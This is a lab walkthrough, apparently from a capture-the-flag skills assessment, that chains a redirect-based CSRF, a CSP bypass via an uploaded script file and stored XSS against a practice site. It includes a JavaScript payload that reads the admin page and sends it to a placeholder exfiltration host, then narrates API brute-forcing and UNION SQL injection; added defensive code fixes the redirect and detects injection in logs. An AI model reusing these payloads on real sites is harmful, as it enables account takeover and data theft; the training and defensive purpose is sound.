Skills Assessment
Question 1: Compromise the target machine.
Enumerate all web applications on the target machine for XSS and CSRF vulnerabilities.
Develop a robust exploit for any identified XSS or CSRF vulnerability.
Execute the exploit to compromise the target machine and obtain the flag.
Skills Assessment Questions
Question 1: Obtain the flag.
1. Add the necessary vHosts to your `/etc/hosts` file:

    ```bash
    sudo sh -c 'echo "10.129.233.63 exploitserver.htb vulnerablesite.htb" >> /etc/hosts'
    ```

2. Open Burp Suite, then open Firefox and browse to `https://vulnerablesite.htb` while intercepting the request.
3. Forward the initial request, then forward the redirect to `/login.php` and inspect the server response. You may need to remove the `Cookie:` header before sending the request.
4. Note that the server's Content Security Policy is `script-src 'self'`, and that cookies are set with the `HttpOnly` and `SameSite=Strict` attributes.
5. Turn off Burp Suite's Intercept and log in to the vulnerable site (`https://vulnerablesite.htb`) using the credentials `htb-stdnt:Academy_student!`.
6. Upon logging in, you will find links on the left-hand side of the page for Dashboard, File Management, User Management, Task Management, Admin Panel, and Logout.
7. Go to User Management, then click the button "Promote the htb-stdnt user". You will receive the message "Only moderators and administrators can promote other users!". You need to find a way to have the victim moderator user perform the action of promoting the `htb-stdnt` user.
8. Press the Logout button on the left-hand side of the page, and intercept it with Burp Suite.
9. Forward the request; you will find that the next request is to the endpoint `/index.php?next=/login.php`.
10. Having identified a client-side redirect, craft a payload on the exploit server (`https://exploitserver.htb`) forcing the victim to visit this endpoint, modified to redirect to `/users.php?userid=3` rather than `/login.php`, which causes a promotion of the `htb-stdnt` user:

    ```html
    <script>
    document.location = "https://vulnerablesite.htb/index.php?next=/users.php%3fuserid=3";
    </script>
    ```

11. Save and then Deliver to Victim. Then, log back into the vulnerable site and check the User Management tab, confirming that you now have the moderator role.
12. With the moderator role, you are now able to add new tasks within the Task Management portion of the vulnerable site, creating an XSS attack vector against the administrator user, who frequently monitors the tasks.
13. Submitting the payload `<script>alert("1")</script>` as a new task will not execute, because the CSP does not permit inline JavaScript. You need to use the File Management page to upload a text file containing the JavaScript payload, then submit a payload to the Task Management page that references the text file as the script source. Create a file `alert.txt` with content `alert("1")`:

    ```bash
    echo 'alert("1")' > alert.txt
    ```

14. After selecting the `alert.txt` file and pressing Upload, click Access to view the text file along with its URL.
15. Return to Task Management, and add a task containing a `<script>` tag whose `src` is the URL of the uploaded text file.
16. Having confirmed that the XSS vulnerability works, repeat this process, uploading a new text file (e.g., named `admin_panel.txt`) containing a JavaScript payload that exfiltrates the contents of the Admin Panel:

    ```javascript
    // Fetch the Admin Panel in the victim's own session (same origin, so cookies are sent)
    var xhr = new XMLHttpRequest();
    xhr.open('GET', '/admin.php', false);
    xhr.withCredentials = true;
    xhr.send();

    // Send the Base64-encoded page to the exfiltration server (PWNIP/PWNPO are placeholders)
    var exfil = new XMLHttpRequest();
    exfil.open("GET", "https://PWNIP:PWNPO/exfil?r=" + btoa(xhr.responseText), false);
    exfil.send();
    ```

17. Submit the new task.
18. After a few moments, check your exfiltration server to confirm data exfiltration.
19. Decode the Base64-encoded response, which will reveal the flag.
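Steps 8 to 11 work because `/index.php?next=` redirects client-side to whatever path it is given and the promotion at `/users.php?userid=3` is a plain GET, so a cross-site page can walk the victim's browser into it even with `SameSite=Strict` cookies. The following is an added example, not code from the lab or this page, of the server-side checks that close both halves; the allowlisted pages, the parameter names and the token handling are assumptions.

```python
import hmac
from urllib.parse import unquote, urlsplit

# Pages a redirect through index.php?next= may legitimately land on (assumed allowlist).
ALLOWED_NEXT = {"/login.php", "/index.php"}
DEFAULT_NEXT = "/login.php"


def safe_next(next_param: str) -> str:
    """Return a redirect target that is guaranteed to be one of ALLOWED_NEXT.

    The walkthrough's payload smuggles /users.php?userid=3 through `next` by
    encoding '?' as %3f. Decoding first and then parsing the result as a URL
    means any scheme, host, query string or fragment is seen and refused
    instead of being forwarded verbatim to the browser.
    """
    if not next_param:
        return DEFAULT_NEXT
    target = unquote(next_param)
    parts = urlsplit(target)
    # A scheme or host (including protocol-relative //host) means off-site.
    if parts.scheme or parts.netloc or target.startswith(("//", "/\\")):
        return DEFAULT_NEXT
    # Only a bare, allowlisted path is accepted; no query or fragment.
    if parts.query or parts.fragment or parts.path not in ALLOWED_NEXT:
        return DEFAULT_NEXT
    return parts.path


def promotion_allowed(method: str, session_csrf: str, submitted_csrf: str) -> bool:
    """Gate for a state-changing action such as promoting a user.

    A GET that changes state (like /users.php?userid=3 in the lab) can be
    reached by a redirect the victim never chose. Requiring POST plus a
    per-session token that a cross-site page cannot read closes that route
    even when a client-side redirect sidesteps SameSite=Strict.
    """
    if method.upper() != "POST" or not session_csrf or not submitted_csrf:
        return False
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(session_csrf, submitted_csrf)
```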
Students will proceed to decode the Base64-encoded response:
The decoded response contains a script that reveals the location of an API, `https://api.vulnerablesite.htb/v1/customers`.
Direct access to the `customers` endpoint is blocked. Therefore, use a brute-forcer to identify other endpoint(s) within the API:
Checking the exploit server, you will find that two endpoints are returned. Decode these responses, identifying the `customer` and `customers` endpoints:
Enumerate the `customer` endpoint further:
However, the API returns an error response indicating that a customer ID must be specified. Supply an ID:
By specifying an ID, you will see that you can successfully fetch customer information from the database.
Test for SQL injection against the `customer` endpoint:
The API returns the same response as before, confirming the injection vulnerability.
Modify your payload, using an `ORDER BY` clause to discover the number of columns in the table being returned. Test for 3 columns:
The API successfully returns user data while ordering by column 3.
However, when attempting to order by column 4, the API returns an error. Therefore, the table has 3 columns.
With this information, use UNION injection to further enumerate the database, beginning with the backend DBMS in use. Use the `@@version` payload to test for MySQL:
Decoding the response, you will confirm that the DBMS in use is MySQL.
Next, use the `database()` payload to find the current database:
Decoding the exfiltrated response, you will see that the database is named `db`.
Knowing the name of the database, you now need to enumerate its tables:
You will note that the API returns only one row of data, so only the `files` table is revealed.
Enumerate additional tables:
The `customers` table is returned next.
Continue the enumeration of tables:
The `users` table is returned next.
Continue the enumeration of tables:
The `secretdata` table is revealed.
Now, enumerate the columns present in the `secretdata` table:
The first column revealed is `id`.
Enumerate additional columns:
A second column, `secretdata`, is now revealed.
Finally, query the contents of the `secretdata` column from the `secretdata` table:
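The `ORDER BY` probing, the `UNION` queries, the `@@version`/`database()` fingerprinting and the `information_schema` enumeration above leave a recognisable sequence in the API's access log. The following added example, not code from the page or the lab, runs that detection logic over constructed combined-format log lines; the client addresses and the `id` parameter name are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format (not taken from the lab).
# The client addresses and the "id" parameter name are assumptions.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /v1/customer?id=1 HTTP/1.1" 200 143
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /v1/customer?id=1%20ORDER%20BY%203 HTTP/1.1" 200 143
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /v1/customer?id=1%20ORDER%20BY%204 HTTP/1.1" 500 61
10.10.14.5 - - [01/Jan/2024:10:00:04 +0000] "GET /v1/customer?id=1%20UNION%20SELECT%201,@@version,3 HTTP/1.1" 200 160
10.10.14.5 - - [01/Jan/2024:10:00:05 +0000] "GET /v1/customer?id=1%20UNION%20SELECT%201,table_name,3%20FROM%20information_schema.tables%20LIMIT%201,1 HTTP/1.1" 200 150
10.10.14.9 - - [01/Jan/2024:10:00:06 +0000] "GET /v1/customer?id=2 HTTP/1.1" 200 141
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# Signatures in the order the walkthrough's enumeration uses them.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "dbms_fingerprint": re.compile(r"@@version|\bdatabase\s*\(\s*\)", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
}

def classify(path: str) -> set:
    """Names of the signatures matched by a URL-decoded request path."""
    return {name for name, rx in SIGNATURES.items() if rx.search(unquote_plus(path))}

def scan(log_text: str, api_prefix: str = "/v1/") -> dict:
    """Per-client summary: signatures hit and 5xx responses to injection-shaped requests."""
    findings = defaultdict(lambda: {"signatures": set(), "errors": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["path"].startswith(api_prefix):
            continue
        hits = classify(m["path"])
        rec = findings[m["ip"]]
        rec["signatures"] |= hits
        if hits and m["status"].startswith("5"):
            rec["errors"] += 1  # e.g. ORDER BY 4 against a 3-column result
    return dict(findings)

def suspicious_clients(log_text: str) -> list:
    """Clients that ran UNION/schema queries, or whose ORDER BY probing produced server errors."""
    return sorted(ip for ip, rec in scan(log_text).items()
                  if "union_select" in rec["signatures"]
                  or ("order_by_probe" in rec["signatures"] and rec["errors"] > 0))
```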